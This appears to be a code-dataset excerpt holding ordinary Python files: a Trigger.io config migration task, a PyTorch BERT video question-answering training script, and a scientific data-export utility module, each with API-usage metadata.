{"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 230, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 230, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}]} +{"seq_id": "271220369", "text": "import json\nimport logging\nimport sys\nimport shutil\n\nfrom build import ConfigurationError\nfrom lib import task, BASE_EXCEPTION\n\nlog = logging.getLogger(__name__)\n\nclass MigrationError(BASE_EXCEPTION):\n\tpass\n\n@task\ndef migrate_config(build):\n\tfrom_platform_version = \"v1.2\"\n\tto_platform_version = \"v1.3\"\n\tfrom_config_version = \"1\"\n\tto_config_version = \"2\"\n\n\t# Check platform version\n\tif build.config['platform_version'] != from_platform_version:\n\t\traise MigrationError(\"'platform_version' in your src/config.json file is not set to '\"+from_platform_version+\"'\\nThis could mean you have already migrated, in which case you can run a build as normal, or it could mean your platform version is set to a 
specific minor version or custom version.\\n\\nIf you are not sure how to proceed contact support@trigger.io.\")\n\t\n\t# Check config version\n\tif \"config_version\" in build.config and build.config[\"from_config_version\"] != 1:\n\t\traise MigrationError(\"Config file version was expected to be: \"+from_config_version+\" however it was not.\\n\\nIf you are not sure how to proceed contact support@trigger.io.\")\n\t\n\t# Prompt\n\tinteractive = build.tool_config.get('general.interactive', True)\n\tif interactive:\n\t\tresp = raw_input(\"Your app will be migrated from platform version: \"+from_platform_version+\" to: \"+to_platform_version+\".\\n\\nThis migration will automatically update your 'src/config.json' file, further details are available from http://current-docs.trigger.io/release-notes.html\\n\\nPlease enter 'y' to continue or anything else to cancel:\\n\")\n\t\tif resp.lower() != \"y\":\n\t\t\traise MigrationError(\"User cancelled migration\")\n\t\t\treturn\n\n\t\n\t# Regenerate config\n\tdef copy_if_exists(key, from_dict, to_dict):\n\t\tif key in from_dict:\n\t\t\tto_dict[key] = from_dict[key]\n\t\t\t\n\tdef generate_icons(target, sizes, from_dict, to_dict):\n\t\tnew_target = {}\n\t\tfor size in sizes:\n\t\t\tif target in from_dict['icons'] and size in from_dict['icons'][target]:\n\t\t\t\tnew_target[size] = from_dict['icons'][target][size]\n\t\t\telif size in from_dict['icons']:\n\t\t\t\tnew_target[size] = from_dict['icons'][size]\n\t\t\n\t\t# Only save the icons if we have all the required sizes, else we'll cause a build failure\n\t\tif len(sizes) == len(new_target):\n\t\t\tto_dict['icons'][target] = new_target\n\t\n\tnew_config = {}\n\n\t# Add basic options\n\tnew_config['config_version'] = to_config_version\n\tnew_config['name'] = build.config['name']\n\tnew_config['author'] = build.config['author']\n\tcopy_if_exists('description', build.config, new_config)\n\tnew_config['platform_version'] = to_platform_version\n\tnew_config['version'] = build.config['version']\n\tcopy_if_exists('homepage', build.config, new_config)\n\n\t# Copy partners\n\tcopy_if_exists('partners', build.config, new_config)\n\t\n\t# Add default set of modules\n\tnew_config['modules'] = {\n\t\t\"contact\": True,\n\t\t\"event\": True,\n\t\t\"file\": True,\n\t\t\"geolocation\": True,\n\t\t\"is\": True,\n\t\t\"logging\": {\n\t\t\t\"level\": \"INFO\"\n\t\t},\n\t\t\"message\": True,\n\t\t\"notification\": True,\n\t\t\"prefs\": True,\n\t\t\"request\": {\n\t\t\t\"permissions\": []\n\t\t},\n\t\t\"sms\": True,\n\t\t\"tabs\": True,\n\t\t\"tools\": True\n\t}\n\t# Add any current modules\n\tif \"modules\" in build.config:\n\t\tfor module in build.config[\"modules\"]:\n\t\t\tnew_config[\"modules\"][module] = build.config[\"modules\"][module]\n\n\t# Add any custom module config from old config\n\tcopy_if_exists('update_url', build.config, new_config[\"modules\"])\n\tcopy_if_exists('parameters', build.config, new_config[\"modules\"])\n\tcopy_if_exists('package_names', build.config, new_config[\"modules\"])\n\tcopy_if_exists('logging', build.config, new_config[\"modules\"])\n\tcopy_if_exists('orientations', build.config, new_config[\"modules\"])\n\t\n\tif \"activations\" in build.config and len(build.config['activations']) != 0:\n\t\tnew_config['modules']['activations'] = build.config['activations']\n\tif \"background_files\" in build.config and len(build.config['background_files']) != 0:\n\t\tnew_config['modules']['background'] = { \"files\": build.config['background_files'] }\n\tif \"browser_action\" in 
build.config:\n\t\tnew_config['modules']['button'] = build.config['browser_action']\n\tif \"libs\" in build.config and \"gmail\" in build.config[\"libs\"]:\n\t\tnew_config['modules']['gmail'] = True\n\tif \"libs\" in build.config and \"jquery\" in build.config[\"libs\"]:\n\t\tnew_config['modules']['jquery'] = build.config[\"libs\"][\"jquery\"]\n\tif \"launch_images\" in build.config:\n\t\tnew_config['modules']['launchimage'] = build.config['launch_images']\n\tif \"permissions\" in build.config:\n\t\tperms = build.config['permissions']\n\t\tif \"tabs\" in perms:\n\t\t\tperms.remove(\"tabs\")\n\t\tif \"notifications\" in perms:\n\t\t\tperms.remove(\"notifications\")\n\t\tnew_config['modules']['request']['permissions'] = perms\n\n\t# Migrate icons\n\tif \"icons\" in build.config:\n\t\tnew_config[\"modules\"]['icons'] = {};\n\t\tgenerate_icons('android', ['36', '48', '72'], build.config, new_config[\"modules\"])\n\t\tgenerate_icons('chrome', ['16', '48', '128'], build.config, new_config[\"modules\"])\n\t\tgenerate_icons('firefox', ['32', '64'], build.config, new_config[\"modules\"])\n\t\tgenerate_icons('ios', ['57', '72', '114', '512'], build.config, new_config[\"modules\"])\n\t\tgenerate_icons('safari', ['32', '48', '64'], build.config, new_config[\"modules\"])\n\t\n\t# Backup config file\n\tshutil.copy2('src/config.json', 'src/config.json.bak')\n\t\n\t# Output new config\n\tnew_config_str = json.dumps(new_config, indent=4, sort_keys=True).replace(\" \", \"\\t\")\n\tf = open('src/config.json', 'w')\n\tf.write(new_config_str)\n\tf.close()\n\t\n\tlog.info(\"Migration complete, you should now be able to build as normal with the new platform version, see http://current-docs.trigger.io/release-notes.html for details of the changes made.\")", "sub_path": ".template/generate_dynamic/migrate_tasks.py", "file_name": "migrate_tasks.py", "file_ext": "py", "file_size_in_byte": 5567, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "lib.BASE_EXCEPTION", "line_number": 11, "usage_type": "name"}, {"api_name": "build.config", "line_number": 22, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 26, "usage_type": "attribute"}, {"api_name": "build.tool_config.get", "line_number": 30, "usage_type": "call"}, {"api_name": "build.tool_config", "line_number": 30, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 59, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 60, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 61, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 63, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 64, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 67, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 90, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 91, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 92, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 95, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 96, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 97, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 98, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 99, "usage_type": "attribute"}, {"api_name": 
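Two subtleties in the migration task above. First, the version guard checks for a "config_version" key but then reads `build.config["from_config_version"]`, a key that is never set, so any config that does carry a version would raise KeyError rather than the intended MigrationError. Second, the write-out uses `json.dumps(new_config, indent=4, sort_keys=True).replace(" ", "\t")`, which rewrites every space in the serialized file, including spaces inside string values, so an app named "My App" would come back as "My\tApp". On Python 3, `json.dumps(obj, indent='\t')` does this directly; on the Python 2 runtime this script targets (it calls `raw_input`), replacing only the leading indentation keeps values intact. A sketch:

```python
import json
import re

def dumps_with_tabs(obj):
    """Pretty-print JSON with tab indentation without touching spaces inside values."""
    text = json.dumps(obj, indent=4, sort_keys=True)
    # rewrite each leading run of 4-space units as tabs; interior spaces survive
    return re.sub(r'^(?: {4})+',
                  lambda m: '\t' * (len(m.group(0)) // 4),
                  text, flags=re.MULTILINE)
```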
"build.config", "line_number": 101, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 102, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 103, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 104, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 105, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 106, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 107, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 109, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 110, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 111, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 112, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 113, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 114, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 122, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 124, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 125, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 126, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 127, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 128, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 131, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 134, "usage_type": "call"}, {"api_name": "lib.task", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "462592358", "text": "import os\nfrom utils.utils import *\nfrom utils.opts import *\nimport torch.optim as optim\nfrom model.Model import Model\nfrom torch.utils.data import DataLoader\nfrom utils.dataloader import VideoDataset\nfrom model.transformer.Optim import ScheduledOptim\nfrom pytorch_pretrained_bert import BertTokenizer\n\ndef tokenize_text(tokenizer, list_text):\n \"\"\"\n :param tokenizer: Bert Tokenizer\n :param list_text: List of the raw texts/\n :return: batch tensor.\n \"\"\"\n tokens = [torch.LongTensor(tokenizer.convert_tokens_to_ids(tokenizer.tokenize(x))) for x in list_text]\n lengths = [len(_) for _ in tokens]\n\n # Padding the sentences into batch\n batch_tokens = torch.zeros(len(lengths), max(lengths))\n for idx, token in enumerate(tokens):\n batch_tokens[idx, 0:lengths[idx]] = tokens[idx]\n return batch_tokens.long()\n\ndef train(loader, model, optimizer, tokenizer, opt):\n # model.train()\n for epoch in range(opt['epochs']):\n iteration = 0\n\n for data in loader:\n torch.cuda.synchronize()\n\n # Batch * length * 1024\n fc_feats = data['fc_feats'].cuda()\n target = data['target'].cuda()\n question = data['question']\n question = tokenize_text(tokenizer,question).cuda()\n \n prob = model(fc_feats,question)\n \n \n# gt_answers = data['gt_answer']\n# ca_answer1 = data['ca_answer1']\n# ca_answer2 = data['ca_answer2']\n# ca_answer3 = data['ca_answer3']\n\n # Pre-process the captions using BERT tokenizer\n# gt_tokens = tokenize_text(tokenizer, gt_answers).cuda()\n# ca_tokens1 = tokenize_text(tokenizer, ca_answer1).cuda()\n# ca_tokens2 = tokenize_text(tokenizer, ca_answer2).cuda()\n# ca_tokens3 = tokenize_text(tokenizer, ca_answer3).cuda()\n\n # Feed into the model for training\n# prob, labels = model(fc_feats, gt_tokens, ca_tokens1, ca_tokens2, ca_tokens3)\n\n loss = 
torch.nn.functional.binary_cross_entropy_with_logits(prob.squeeze(1), target)\n\n # Backward loss and clip gradient\n loss.backward()\n optimizer.step_and_update_lr()\n torch.nn.utils.clip_grad_norm_(filter(lambda p: p.requires_grad, model.parameters()), 1)\n\n # update parameters\n loss_item = loss.item()\n torch.cuda.synchronize()\n iteration += 1\n\n print('iter %d (epoch %d), loss = %.6f' % (iteration, epoch, loss_item))\n\n if epoch % opt['save_checkpoint_every'] == 0:\n model_path = os.path.join(opt['checkpoint_path'], 'V2C_QA_Bert_Base_%d.pth' % epoch)\n model_info_path = os.path.join(opt['checkpoint_path'], 'model_score.txt')\n torch.save(model.state_dict(), model_path)\n print('model saved to %s' % model_path)\n\n # Save the logging information\n with open(model_info_path, 'a') as f:\n f.write('model_%d, loss: %.6f' % (epoch, loss_item))\n\n\ndef main(opt):\n dataset = VideoDataset(opt, 'train')\n dataloader = DataLoader(dataset, batch_size=opt['batch_size'], shuffle=True)\n\n model = Model()\n model = model.cuda()\n\n # Load pre-trained checkpoint\n # cap_state_dict = torch.load('./save/model_cap-att.pth')\n # model_dict = model.state_dict()\n # model_dict.update(cap_state_dict)\n # model.load_state_dict(model_dict)\n\n # Initialize the optimizer\n optimizer = ScheduledOptim(optim.Adam(filter(lambda x: x.requires_grad, model.parameters()),\n betas=(0.9, 0.98), eps=1e-09), 512, opt['warm_up_steps'])\n\n # Initialize the tokenizer\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)\n\n train(dataloader, model, optimizer, tokenizer, opt)\n\nif __name__ == '__main__':\n opt = parse_opt()\n opt = vars(opt)\n main(opt)", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 3956, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.optim.LongTensor", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.optim.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.optim.cuda.synchronize", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.optim.cuda", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 32, "usage_type": "name"}, {"api_name": "model.Model", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.optim.nn.functional.binary_cross_entropy_with_logits", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.optim.nn", "line_number": 57, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.optim.nn.utils.clip_grad_norm_", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.optim.nn", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 62, "usage_type": "name"}, {"api_name": "model.Model.parameters", "line_number": 62, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.optim.cuda.synchronize", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.optim.cuda", "line_number": 66, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 66, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": 
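Two ordering issues in the training loop above: the gradients are never zeroed, so they accumulate across iterations, and `clip_grad_norm_` runs after `optimizer.step_and_update_lr()`, where it can no longer affect the update that was just applied. The conventional sequence is zero → backward → clip → step; a sketch using the same wrapper (assuming, as in the usual ScheduledOptim implementations, that it forwards `zero_grad` to the inner Adam):

```python
optimizer.zero_grad()                 # assumed to delegate to the wrapped Adam optimizer
loss.backward()
# clip *before* stepping so the optimizer applies the bounded gradients
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0)
optimizer.step_and_update_lr()
```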
"os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.optim.save", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 74, "usage_type": "name"}, {"api_name": "model.Model.state_dict", "line_number": 74, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 74, "usage_type": "name"}, {"api_name": "utils.dataloader.VideoDataset", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 84, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 86, "usage_type": "name"}, {"api_name": "model.Model.Model", "line_number": 86, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 87, "usage_type": "name"}, {"api_name": "model.Model.cuda", "line_number": 87, "usage_type": "call"}, {"api_name": "model.transformer.Optim.ScheduledOptim", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 96, "usage_type": "name"}, {"api_name": "model.Model.parameters", "line_number": 96, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 96, "usage_type": "name"}, {"api_name": "pytorch_pretrained_bert.BertTokenizer.from_pretrained", "line_number": 100, "usage_type": "call"}, {"api_name": "pytorch_pretrained_bert.BertTokenizer", "line_number": 100, "usage_type": "name"}, {"api_name": "model.Model", "line_number": 102, "usage_type": "argument"}]} +{"seq_id": "417596892", "text": "import os\nimport logging\nfrom dataclasses import dataclass\nfrom deprecation import deprecated\n\nimport numpy as np\nimport scipy.signal\nfrom scipy import io as sio\nfrom slugify import slugify\nfrom typing import List, Tuple, Iterable, Union, Dict, Optional\nimport plotly.graph_objs as go\nimport json\nfrom igorwriter import IgorWave\nimport io\nfrom pathlib import Path\n\nlogger = logging.getLogger(__name__)\n\nfrom .core_util import get_data_index, get_matching_x, edit_params, sig_fig, decimate, FIR_filter, \\\n get_sweeprate, bin_data, get_bin_size, mean_data, center_data, resample_data, run_multithreaded, run_multiprocessed, \\\n ensure_list, order_list, my_round, get_project_root, Data1D, Data2D\nfrom .hdf_util import NotFoundInHdfError\n\nARRAY_LIKE = Union[np.ndarray, List, Tuple]\n\n\ndef set_default_logging(level_override=None):\n # logging.basicConfig(level=logging.INFO, format=f'%(threadName)s %(funcName)s %(lineno)d %(message)s')\n # logging.basicConfig(level=logging.INFO, force=True, format=f'%(levelname)s:%(module)s:%(lineno)d:%(funcName)s:%(message)s')\n root_logger = logging.getLogger()\n root_logger.handlers = [] # Probably a bad thing to be doing...\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n f'%(thread)d:%(process)d:%(levelname)s:%(module)s:%(lineno)d:%(funcName)s:%(message)s')\n handler.setFormatter(formatter)\n root_logger.addHandler(handler)\n if level_override:\n root_logger.setLevel(level_override)\n\n\ndef _save_to_checks(datas, names, file_path, fp_ext=None):\n assert type(datas) == list\n assert type(names) == list\n base, tail = os.path.split(file_path)\n if base != '':\n assert os.path.isdir(base) # Check points to existing folder\n if fp_ext is not None:\n if tail[-(len(fp_ext)):] != fp_ext:\n tail += fp_ext # add extension if necessary\n logger.warning(f'added \"{fp_ext}\" to end of file_path provided to make [{file_path}]')\n file_path = 
os.path.join(base, tail)\n return file_path\n\n\ndef save_to_mat(datas, names, file_path):\n file_path = _save_to_checks(datas, names, file_path, fp_ext='.mat')\n mat_data = dict(zip(names, datas))\n sio.savemat(file_path, mat_data)\n logger.info(f'saved [{names}] to [{file_path}]')\n\n\ndef save_to_txt(datas, names, file_path):\n file_path = _save_to_checks(datas, names, file_path, fp_ext='.txt')\n for data, name in zip(datas, names):\n path, ext = os.path.splitext(file_path)\n fp = path + f'_{slugify(name)}' + ext # slugify ensures filesafe name\n np.savetxt(fp, data)\n logger.info(f'saved [{name}] to [{fp}]')\n\n\ndef fig_to_igor_itx(f: go.Figure, filepath: str):\n d = data_from_plotly_fig(f)\n waves = []\n for k in d:\n if not k.endswith('_x') and not k.endswith('_y'):\n wave = IgorWave(d[k], name=k)\n y_units = f.layout.yaxis.title.text\n y_units = y_units if y_units else 'not set'\n wave.set_datascale(y_units)\n for dim in ['x', 'y']:\n if f'{k}_{dim}' in d:\n dim_arr = d[f'{k}_{dim}']\n x_units = f.layout.xaxis.title.text\n x_units = x_units if x_units else 'not set'\n wave.set_dimscale('x', dim_arr[0], np.mean(np.diff(dim_arr)), units=x_units)\n waves.append(wave)\n with open(filepath, 'w') as fp:\n for wave in waves:\n wave.save_itx(fp, image=True) # Image = True hopefully makes np and igor match in x/y\n\n\ndef power_spectrum(data, meas_freq, normalization=1):\n \"\"\"\n Computes power spectrum and returns (freq, power spec)\n Args:\n data (): 1D data to calculate spectrum for\n meas_freq (): Frequency of measurement (not sample rate)\n normalization (): Multiplies data before calculating\n\n Returns:\n\n \"\"\"\n freq, power = scipy.signal.periodogram(data * normalization, fs=meas_freq)\n return freq, power\n\n\ndef dac_step_freq(x_array=None, freq=None, dat=None):\n if dat:\n assert all([x_array is None, freq is None])\n x_array = dat.Data.x_array\n freq = dat.Logs.Fastdac.measure_freq\n\n full_x = abs(x_array[-1] - x_array[0])\n num_x = len(x_array)\n min_step = 20000 / 2 ** 16\n req_step = full_x / num_x\n step_every = min_step / req_step\n step_t = step_every / freq\n step_hz = 1 / step_t\n return step_hz\n\n\n@dataclass\nclass IgorSaveInfo:\n x: np.ndarray\n data: np.ndarray\n name: str\n x_label: str\n y_label: str\n y: Optional[np.ndarray] = None\n\n\ndef save_multiple_save_info_to_itx(file_path: str, save_infos: List[IgorSaveInfo]):\n \"\"\"\n Save multiple save infos to a single .itx file\n Args:\n file_path ():\n save_infos ():\n\n Returns:\n\n \"\"\"\n save_to_igor_itx(file_path=file_path,\n xs=[s.x for s in save_infos],\n ys=[s.y for s in save_infos],\n datas=[s.data for s in save_infos],\n names=[s.name for s in save_infos],\n x_labels=[s.x_label for s in save_infos],\n y_labels=[s.y_label for s in save_infos],\n )\n\n\ndef save_to_igor_itx(file_path: str, xs: List[np.ndarray], datas: List[np.ndarray], names: List[str],\n ys: Optional[List[np.ndarray]] = None,\n x_labels: Optional[Union[str, List[str]]] = None,\n y_labels: Optional[Union[str, List[str]]] = None):\n \"\"\"Save data to a .itx file which can be dropped into Igor\"\"\"\n\n def check_axis_linear(arr: np.ndarray, axis: str, name: str, current_waves: list) -> bool:\n if arr.shape[-1] > 1 and not np.all(np.isclose(np.diff(arr), np.diff(arr)[0])):\n logger.warning(f\"{file_path}: Igor doesn't support a non-linear {axis}-axis. 
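The `power_spectrum` helper in the record above delegates to `scipy.signal.periodogram`; a quick usage check on a signal with a known 50 Hz component shows that the returned frequency axis is in Hz when `fs` is the sampling rate:

```python
import numpy as np
import scipy.signal

fs = 1000.0                                 # samples per second
t = np.arange(0, 1.0, 1.0 / fs)
x = np.sin(2 * np.pi * 50 * t)              # pure 50 Hz tone
freq, power = scipy.signal.periodogram(x, fs=fs)
print(freq[np.argmax(power)])               # ~50.0
```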
Saving as separate wave\")\n axis_wave = IgorWave(arr, name=name + f'_{axis}')\n current_waves.append(axis_wave)\n return False\n else:\n return True\n\n if x_labels is None or isinstance(x_labels, str):\n x_labels = [x_labels] * len(datas)\n if y_labels is None or isinstance(y_labels, str):\n y_labels = [y_labels] * len(datas)\n if ys is None:\n ys = [None] * len(datas)\n assert all([len(datas) == len(list_) for list_ in [xs, names, x_labels, y_labels]])\n\n waves = []\n for x, y, data, name, x_label, y_label in zip(xs, ys, datas, names, x_labels, y_labels):\n wave = IgorWave(data, name=name)\n if x is not None:\n if check_axis_linear(x, 'x', name, waves):\n wave.set_dimscale('x', x[0], np.mean(np.diff(x)), units=x_label)\n if y is not None:\n if check_axis_linear(y, 'y', name, waves):\n wave.set_dimscale('y', y[0], np.mean(np.diff(y)), units=y_label)\n elif y_label is not None:\n wave.set_datascale(y_label)\n waves.append(wave)\n\n with open(file_path, 'w') as fp:\n for wave in waves:\n wave.save_itx(fp, image=True) # Image = True hopefully makes np and igor match in x/y\n\n\ndef data_from_plotly_fig(f: go.Figure) -> Dict[str, np.ndarray]:\n all_data = {}\n for i, d in enumerate(f.data):\n name = getattr(d, 'name', None)\n if name is None:\n name = f'data{i}'\n elif name in all_data.keys():\n name = name + f'_{i}'\n if 'z' in d: # Then it is 2D\n all_data[name] = getattr(d, 'z')\n all_data[name + '_y'] = getattr(d, 'y')\n else:\n all_data[name] = getattr(d, 'y')\n all_data[name + '_x'] = getattr(d, 'x')\n return all_data\n\n\ndef data_from_json(filepath: str) -> Dict[str, np.ndarray]:\n with open(filepath, 'r') as f:\n s = f.read()\n js = json.loads(s)\n for k in js:\n js[k] = np.array(js[k], dtype=np.float32)\n return js\n\n\ndef fig_from_json(filepath: str) -> go.Figure:\n with open(filepath, 'r') as f:\n s = f.read()\n fig = go.Figure(json.loads(s))\n return fig\n\n\ndef fig_to_data_json(fig: go.Figure, filepath: str) -> bool:\n \"\"\"Saves all data in figure to json file\"\"\"\n data = data_from_plotly_fig(fig)\n filepath = filepath if os.path.splitext(filepath)[-1] == '.json' else f'{filepath}.json'\n return data_dict_to_json(data, filepath)\n\n\ndef data_dict_to_json(data_dict: dict, filepath: str) -> bool:\n \"\"\"Saves dict of arrays to json\"\"\"\n with open(filepath, 'w+') as f:\n json.dump(data_dict, f, default=lambda arr: arr.tolist())\n return True\n\n\ndef data_to_json(datas: List[np.ndarray], names: List[str], filepath: str) -> dict:\n \"\"\"\n Saves list of data arrays to a json file with names.\n Args:\n datas ():\n names ():\n filepath ():\n\n Returns:\n dict: Dict of data that was saved to json file\n\n \"\"\"\n data_dict = {name: data for name, data in zip(names, datas)}\n data_dict_to_json(data_dict, filepath)\n return data_dict\n\n\n@deprecated(deprecated_in='3.0.0', details='no longer using those dats')\ndef reset_dats(*args: Union[list, int, None], experiment_name: Optional[str] = None):\n \"\"\"Fully overwrites DatHDF of any datnums/lists of datnums passed in\"\"\"\n from .dat_object.make_dat import get_dat\n if reset_dats:\n all_datnums = []\n for datnums in args:\n if isinstance(datnums, list):\n all_datnums.extend(datnums)\n elif isinstance(datnums, (int, np.int32)):\n all_datnums.append(datnums)\n for datnum in all_datnums:\n get_dat(datnum, overwrite=True, exp2hdf=experiment_name)\n\n\n\n", "sub_path": "src/dat_analysis/useful_functions.py", "file_name": "useful_functions.py", "file_ext": "py", "file_size_in_byte": 9616, "program_lang": "python", "lang": 
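The JSON helpers above serialize arrays through `default=lambda arr: arr.tolist()` (json only calls `default` for objects it cannot encode itself, which here is exactly the ndarrays) and rebuild them as float32 on read. A minimal round trip of that convention:

```python
import json
import numpy as np

data = {'trace': np.linspace(0.0, 1.0, 5, dtype=np.float32)}
text = json.dumps(data, default=lambda arr: arr.tolist())          # ndarray -> list
loaded = {k: np.array(v, dtype=np.float32) for k, v in json.loads(text).items()}
assert np.allclose(data['trace'], loaded['trace'])
```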
"en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 24, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 24, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "scipy.io.savemat", "line_number": 58, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 58, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "slugify.slugify", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 67, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 71, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 71, "usage_type": "name"}, {"api_name": "igorwriter.IgorWave", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 85, "usage_type": "call"}, {"api_name": "scipy.signal.signal.periodogram", "line_number": 103, "usage_type": "call"}, {"api_name": "scipy.signal.signal", "line_number": 103, "usage_type": "attribute"}, {"api_name": "scipy.signal", "line_number": 103, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 126, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 130, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 130, "usage_type": "attribute"}, {"api_name": "dataclasses.dataclass", "line_number": 123, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 153, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 153, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 154, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 154, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 155, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 155, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 155, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 156, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 156, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 156, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 159, "usage_type": 